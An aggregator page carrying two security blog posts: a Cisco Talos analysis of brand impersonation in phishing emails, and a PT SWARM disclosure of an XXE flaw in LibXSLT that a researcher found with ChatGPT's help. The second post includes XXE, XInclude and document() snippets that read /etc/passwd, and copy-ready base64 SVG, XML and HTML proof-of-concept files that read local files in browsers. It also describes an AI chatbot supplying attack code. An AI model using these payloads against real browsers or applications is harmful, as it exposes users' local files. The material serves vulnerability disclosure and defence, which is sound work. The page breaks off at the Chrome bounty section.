Normal view

There are new articles available, click to refresh the page.

Before yesterdayVulnerabily Research

Cisco Talos
From trust to trickery: Brand impersonation over the email attack vectorOmid Mirzaei
22 May 2024 at 12:17

From trust to trickery: Brand impersonation over the email attack vector

Cisco Talos

By: Omid Mirzaei

22 May 2024 at 12:17

Cisco recently developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.
Talos has discovered a wide range of techniques threat actors use to embed and deliver brand logos via emails to their victims.
Talos is providing new statistics and insights into detected brand impersonation cases over one month (March - April 2024).
In addition to deploying Cisco Secure Email, user education is key to detecting this type of threat.

Brand impersonation could happen on many online platforms, including social media, websites, emails and mobile applications. This type of threat exploits the familiarity and legitimacy of popular brand logos to solicit sensitive information from victims. In the context of email security, brand impersonation is commonly observed in phishing emails. Threat actors want to deceive their victims into giving up their credentials or other sensitive information by abusing the popularity of well-known brands.

Brand logo embedding and delivery techniques

Threat actors employ a variety of techniques to embed brand logos within emails. One simple method involves inserting words associated with the brand into the HTML source of the email. In the example below, the PayPal logo can be found in plaintext in the HTML source of this email.

An example email impersonating the PayPal brand.

Creating the PayPal logo via HTML.

Sometimes, the email body is base64-encoded to make their detection harder. The base64-encoded snippet of an email body is shown below.

An example email impersonating the Microsoft brand.

A snippet of the base64-encoded body of the above email.

The decoded HTML code is shown in the figure below. In this case, the Microsoft logo has been built via an HTML 2x2 table with four cells and various background colors.

Creating the Microsoft logo via HTML.

A more advanced technique is to fetch the brand logo from remote servers at delivery time. In this technique, the URI of the resource is embedded in the HTML source of the email, either in plain text or Base64-encoded. The logo in the example below is fetched from the below address:
hxxps://image[.]member.americanexpress[.]com/.../AMXIMG_250x250_amex_logo.jpg

An example email impersonating the American Express brand.

The URI from which the American Express brand is being loaded.

Another technique threat actors use is to deliver the brand logo via attachments. One of the most common techniques is to only include the brand logo as an image attachment. In this case, the logo is normally base64-encoded to evade detection. Email clients automatically fetch and render these logos if they’re referenced from the HTML source of the email. In this example, the Microsoft logo is attached to this email as a PNG file and referenced in an <img> HTML tag.

An example email impersonating the Microsoft brand (the logo is attached to the email and is rendered and shown to the victim at delivery time via <img> HTML tag).

The Content-ID (CID) reference of the attached Microsoft brand logo is included inline in the HTML source of the above email.

In other cases, the whole email body, including the brand logo, is attached as an image to the email and is shown to the victim by the email client. The example below is a brand impersonation case where the whole body is included in the PNG attachment, named “shark.png”. Also, an “inline” keyword can be seen in the HTML source of this email. When Content-Disposition is set to "inline," it indicates that the attached content should be displayed within the body of the email itself, rather than being treated as a downloadable attachment.

An example email impersonating the Microsoft Office 365 brand (the whole email body, including the brand logo, is attached to the email as a PNG file).

The whole email body is in the attachment and is included in the above message.

A brand logo may also be embedded within a PDF attachment. In the example shown below, the whole email body is included in a PDF attachment. This email is a QR code phishing email that is also impersonating the Bluebeam brand.

An example email impersonating the Bluebeam brand (the whole email body, including the brand logo, is attached to the email as a PDF file).

The whole email body is included in a PDF attachment.

The scope of brand impersonation

An efficient brand impersonation detection engine plays a key role in an email security product. The extracted information from correctly convicted emails is valuable for threat researchers and customers. Using Cisco Secure Email Threat Defense’s brand impersonation detection engine, we uncovered the true scope of how widespread these attacks are. All data reflects the period between March 22 and April 22, 2024.

Threat researchers can use this information to block future attacks, potentially based on the sender’s email address and domain, the originating IP addresses of brand impersonation attacks, their attachments, the URLs found from such emails, and even phone numbers.

The chart below demonstrates the top sender domains of emails curated by attackers to convince the victims to call a number (i.e., as in Telephone-Oriented Attack Delivery) by impersonating the Best Buy Geek Squad, Norton and PayPal brands. Free email services are widely used by adversaries to send such emails. However, other domains can also be found that are less popular.

Top sender domains of emails impersonating Best Buy Geek Squad, Norton and PayPal brands.

Sometimes, similar brand impersonation emails are sent from a wide range of domains. For example, as shown in the below heatmap, emails impersonating the DocuSign brand were sent from two different domains to our customers on March 28. In other cases, emails are sent from a single domain (e.g., emails impersonating Geek Squad and McAfee brands).

Count of convictions by the impersonated brand and sender domain on March 28.(Note: This is only a subset of convictions we had on this date.)

Brand impersonation emails may target specific industry verticals, or they might be sent indiscriminately. As shown in the chart below, four brand impersonation emails from hotmail.com and softbased.top domains were sent to our customers that would be categorized as either educational or insurance companies. On the other hand, emails from biglobe.ne.jp targeted a wider range of industry verticals.

Count of convictions by industry verticals from different sender domains on April 2^nd (note: this is only a subset of convictions we had in this date).

Cisco customers can also benefit from information provided by the brand impersonation detection engine. By sharing the list of the most frequently impersonated brands with them regularly, they can train their employees to stay vigilant when they observe specific brands in emails.

Top 30 impersonated brands over one month.

Microsoft was the most frequently impersonated brand over the month we observed, followed by DocuSign. Most emails that contained these brands were fake SharePoint and DocuSign phishing messages. Two examples are provided below.

Other top frequently impersonated brands such as NortonLifeLock, PayPal, Chase, Geek Squad and Walmart were mostly seen in callback phishing messages. In this technique, the attackers include a phone number in the email and try to persuade recipients to call that number, thereby changing the communication channel away from email. From there, they may send another link to their victims to deliver different types of malware. The attackers normally do so by impersonating well-known and familiar brands. Two examples of such emails are provided below.

Protect against brand impersonation

Strengthening the weakest link

Humans are still the weakest link in cybersecurity. Therefore, educating users is of paramount importance to reduce the amount and effects of security breaches. Educating people does not only concern employees within a specific organization but in this case, it also involves their customers.

Employees should know an organization’s trusted partners and the way that their organization communicates with them. This way, when an anomaly occurs in that form of communication, they will be able to identify any issues faster. Customers need different communication methods that your organization would use to contact them. Also, they need to be provided with the type of information you will be asking for. When they know these two vital details, they will be less likely to share their sensitive information over abnormal communication platforms (e.g., through emails or text messages).

Brand impersonation techniques are evolving in terms of sophistication, and differentiating fake emails from legitimate ones by a human or even a security researcher demands more time and effort. Therefore, more advanced techniques are required to detect these types of threats.

Asset protection

Well-known brands can protect themselves from this type of threat through asset protection as well. Domain names can be registered with various extensions to thwart threat actors attempting to use similar domains for malicious purposes. The other crucial step brands can take is to conceal their information from WHOIS records via privacy protection. Last, but not least, domain names need to be updated regularly since expired domains can be easily abused by threat actors for illicit activities that can harm your business reputation. Brand names should be registered properly so that your organization can take legal action when a brand impersonation occurs.

Advanced detection methods

Detection methods can be improved to delay the exposure of users to the received emails. Machine learning has improved significantly over the past few years due to advancements in computing resources, the availability of data, and the introduction of new machine learning architectures. Machine learning-based security solutions can be leveraged to improve detection efficacy.

Cisco Talos relies on a wide range of systems to detect this type of threat and protect our customers, from rule-based engines to advanced ML-based systems. Learn more about Cisco Secure Email Threat Defense's new brand impersonation detection tools here.

PT SWARM
Getting XXE in Web Browsers using ChatGPTadmin
22 May 2024 at 14:12

Getting XXE in Web Browsers using ChatGPT

PT SWARM

By: admin

22 May 2024 at 14:12

A year ago, I wondered what a malicious page with disabled JavaScript could do.

I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled?

Since I was too lazy to read the documentation, I started generating examples using ChatGPT.

XSL

The technology I decided to test is XSL. It stands for eXtensible Stylesheet Language. It’s a specialized XML-based language that can be used within or outside of XML for modifying it or retrieving data.

In Chrome, XSL is supported and the library used is LibXSLT. It’s possible to verify this by using system-property('xsl:vendor') function, as shown in the following example.

system-properties.xml

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="system-properties.xsl" type="text/xsl"?>  
<root/>

system-properties.xsl

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<p>
Version: <xsl:value-of select="system-property('xsl:version')" /> <br />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
</p>
</xsl:template>
</xsl:stylesheet>

Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome:

The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous others applications.

The first interesting XSL output from ChatGPT was a code with functionality that allows you to retrieve the location of the current document. While this is not a vulnerability, it could be useful in some scenarios.

get-location.xml

<?xml-stylesheet href="get-location.xsl" type="text/xsl"?>  
<!DOCTYPE test [  
    <!ENTITY ent SYSTEM "?" NDATA aaa>  
]>
<test>
<getLocation test="ent"/>
</test>

get-location.xsl

<xsl:stylesheet version="1.0"  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  
>  
  <xsl:output method="html"/>  
  <xsl:template match="getLocation">  
          <input type="text" value="{unparsed-entity-uri(@test)}" />  
  </xsl:template>  
</xsl:stylesheet>

Here is what you should see after uploading this code to your web server:

All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the “ent” entity, which is constructed using the relative path “?”.

XSL and Remote Content

Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML.

I asked ChatGPT many times about XSL’s content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it.

XML External Entities

Since XSL is XML-based, usage of XML External Entities should be the first option.

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>&xxe;</test>

XInclude

XInclude is an XML add-on that’s described in a W3C Recommendation from November 15, 2006.

<?xml version="1.0"?>
<test xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/passwd"/>
</test>

XLS’s <xsl:import> and <xsl:include> tags

These tags can be used to load files as XSL stylesheets, according to ChatGPT.

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:include href="file:///etc/passwd"/>
  <xsl:import href="file:///etc/passwd"/>
</xsl:stylesheet>

XLS’s document() function

XLS’s document() function can be used for loading files as XML documents.

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet  version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('file:///etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

XXE

Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the argument’s file, utilizing the data protocol. Next, I inserted the content of the XSL file into an XML file, also using the data protocol.

When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin(a.k.a. @yarbabin) confirmed the same result on Android!

Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions.

There was no chance that this wasn’t a vulnerability!

Here is a photo of my Smart TV, where the file reading works as well:

I compiled a table summarizing all my tests:

Test Scenario	Accessible Files
Android + Chrome	/etc/hosts
iOS + Safari	/etc/group, /etc/hosts, /etc/passwd
Windows + Chrome	–
Ubuntu + Chrome	–
PlayStation 4 + Chrome	–
Samsung TV + Chrome	/etc/group, /etc/hosts, /etc/passwd

The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user.

Other Tests

I have tested some applications that use LibXSLT and don’t have sandboxes.

App	Result
PHP	Applications that allow control over `XSLTProcessor::importStylesheet` data can be affected.
XMLSEC	The `document()` function did not allow `http(s)://` and `data:` URLs.
Oracle	The `document()` function did not allow `http(s)://` and `data:` URLs.
PostgreSQL	The `document()` function did not allow `http(s)://` and `data:` URLs.

The default PHP configuration disables parsing of external entities XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT.

According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack.

POCs

You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will be also provided later.

First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them:

The result of opening the xxe_all_tests/test.html page in an outdated Chrome

Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current user’s rights.

As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding:

Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article.

poc.svg

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE svg [  
    <!ENTITY ent SYSTEM "?" NDATA aaa>  
]>
<svg location="ent" />

poc.xml

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE test [  
    <!ENTITY ent SYSTEM "?" NDATA aaa>  
]>
<test1 location="ent"/>

poc.html

<html>
<head>
<title>LibXSLT document() XXE tests</title>
</head>
<body>
SVG<br/>
<iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlsZEdNdmNHRnpjM2RrSlRJeUpUTkZKVEl3SlRWRUpUTkZKVEJCSlRORGVIaGxKVE5GSlRCQkpUSTJlSGhsSlROQ0pUQkJKVE5ESlRKR2VIaGxKVE5GSnlraUx6NEtQQzlrYVhZK0Nqd3ZabTl5WldsbmJrOWlhbVZqZEQ0S1BDOXpkbWMrQ2p3dmVITnNPblJsYlhCc1lYUmxQZ284TDNoemJEcHpkSGxzWlhOb1pXVjBQZz09Ij8+CjwhRE9DVFlQRSBzdmcgWyAgCiAgICA8IUVOVElUWSBlbnQgU1lTVEVNICI/IiBOREFUQSBhYWE+ICAgCl0+CjxzdmcgbG9jYXRpb249ImVudCIgLz4="></iframe><br/>
SVG WIN<br/>
<iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlqT2k5M2FXNWtiM2R6TDNONWMzUmxiUzVwYm1rbE1qSWxNMFVsTWpBbE5VUWxNMFVsTUVFbE0wTjRlR1VsTTBVbE1FRWxNalo0ZUdVbE0wSWxNRUVsTTBNbE1rWjRlR1VsTTBVbktTSXZQZ284TDJScGRqNEtQQzltYjNKbGFXZHVUMkpxWldOMFBnbzhMM04yWno0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0MSBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiIC8+"></iframe><br/>
XML<br/>
<iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluTjVjM1JsYlMxd2NtOXdaWEowZVNnbmVITnNPblpsY25OcGIyNG5LU0lnTHo0OFluSWdMejRnQ2t4dlkyRjBhVzl1T2lBOGVITnNPblpoYkhWbExXOW1JSE5sYkdWamREMGlkVzV3WVhKelpXUXRaVzUwYVhSNUxYVnlhU2hBYkc5allYUnBiMjRwSWlBdlBpQWdQR0p5THo0S1dGTk1JR1J2WTNWdFpXNTBLQ2tnV0ZoRk9pQUtQSGh6YkRwamIzQjVMVzltSUNCelpXeGxZM1E5SW1SdlkzVnRaVzUwS0Nka1lYUmhPaXdsTTBNbE0wWjRiV3dsTWpCMlpYSnphVzl1SlRORUpUSXlNUzR3SlRJeUpUSXdaVzVqYjJScGJtY2xNMFFsTWpKVlZFWXRPQ1V5TWlVelJpVXpSU1V3UVNVelF5VXlNVVJQUTFSWlVFVWxNakI0ZUdVbE1qQWxOVUlsTWpBbE0wTWxNakZGVGxSSlZGa2xNakI0ZUdVbE1qQlRXVk5VUlUwbE1qQWxNakptYVd4bE9pOHZMMlYwWXk5d1lYTnpkMlFsTWpJbE0wVWxNakFsTlVRbE0wVWxNRUVsTTBONGVHVWxNMFVsTUVFbE1qWjRlR1VsTTBJbE1FRWxNME1sTWtaNGVHVWxNMFVuS1NJdlBnbzhMMmgwYld3K0Nqd3ZlSE5zT25SbGJYQnNZWFJsUGdvOEwzaHpiRHB6ZEhsc1pYTm9aV1YwUGc9PSI/Pgo8IURPQ1RZUEUgdGVzdCBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiLz4="></iframe><br/>
XML WIN<br/>
<iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrSmlONE1qQTdQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxjbk5wYjI0bktTSWdMejQ4WW5JZ0x6NGdDa3h2WTJGMGFXOXVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWRXNXdZWEp6WldRdFpXNTBhWFI1TFhWeWFTaEFiRzlqWVhScGIyNHBJaUF2UGlBZ1BHSnlMejRLV0ZOTUlHUnZZM1Z0Ym1WMEtDa2dXRmhGT2lBS1BIaHpiRHBqYjNCNUxXOW1JQ0J6Wld4bFkzUTlJbVJ2WTNWdFpXNTBLQ2RrWVhSaE9pd2xNME1sTTBaNGJXd2xNakIyWlhKemFXOXVKVE5FSlRJeU1TNHdKVEl5SlRJd1pXNWpiMlJwYm1jbE0wUWxNakpWVkVZdE9DVXlNaVV6UmlVelJTVXdRU1V6UXlVeU1VUlBRMVJaVUVVbE1qQjRlR1VsTWpBbE5VSWxNakFsTTBNbE1qRkZUbFJKVkZrbE1qQjRlR1VsTWpCVFdWTlVSVTBsTWpBbE1qSm1hV3hsT2k4dkwyTTZMM2RwYm1SdmQzTXZjM2x6ZEdWdExtbHVhU1V5TWlVelJTVXlNQ1UxUkNVelJTVXdRU1V6UTNoNFpTVXpSU1V3UVNVeU5uaDRaU1V6UWlVd1FTVXpReVV5Um5oNFpTVXpSU2NwSWk4K0Nqd3ZhSFJ0YkQ0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0IFsgIAogICAgPCFFTlRJVFkgZW50IFNZU1RFTSAiPyIgTkRBVEEgYWFhPiAgIApdPgo8dGVzdDEgbG9jYXRpb249ImVudCIvPg=="></iframe><br/>
</body>

ZIP archive for testing: libxslt.zip.

The Bounty

All findings were immediately reported to the vendors.

Safari

Apple implemented the sandbox patch. Assigned CVE: CVE-2023-40415. Reward: $25,000.

Chrome

